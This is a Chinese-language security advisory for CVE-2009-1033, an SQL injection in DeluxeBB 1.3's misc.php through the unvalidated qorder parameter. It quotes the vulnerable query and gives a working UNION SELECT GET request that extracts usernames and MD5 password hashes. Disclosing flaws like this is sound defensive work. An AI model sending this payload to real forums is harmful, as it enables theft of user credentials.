发布日期：2009-03-18
更新日期：2009-03-19

受影响系统：

DeluxeBB DeluxeBB <= 1.3

描述：

---

BUGTRAQ  ID: 34174
CVE(CAN) ID: CVE-2009-1033

DeluxeBB是一款基于PHP的论坛程序。

DeluxeBB的misc.php模块中没有正确地验证用户所提交的$qorder参数：

    $getsel = $db->query("SELECT * FROM ".$prefix."users ".$qfilter." ".$qorder."  <==
                     ".$sort." LIMIT ".$pageinfo[0].",".$pageinfo[1]);

远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击，导致读取论坛所有注册用户的用户名和口令MD5。

<*来源：GiReX
  
  链接：http://milw0rm.com/exploits/8240
        http://secunia.com/advisories/34365/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET [target]/[path]/misc.php?sub=memberlist&order=1&
qorder=UNION+ALL+SELECT+uid,username,3,4,membercode,6,7,8,9,10,11,12,13,14,pass,16,17,18,19,20,21,22,23,24,25,26,27,28,29+
FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1

建议：

---

厂商补丁：

DeluxeBB
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.deluxebb.com/

浏览次数：3406
严重程度：0（网友投票）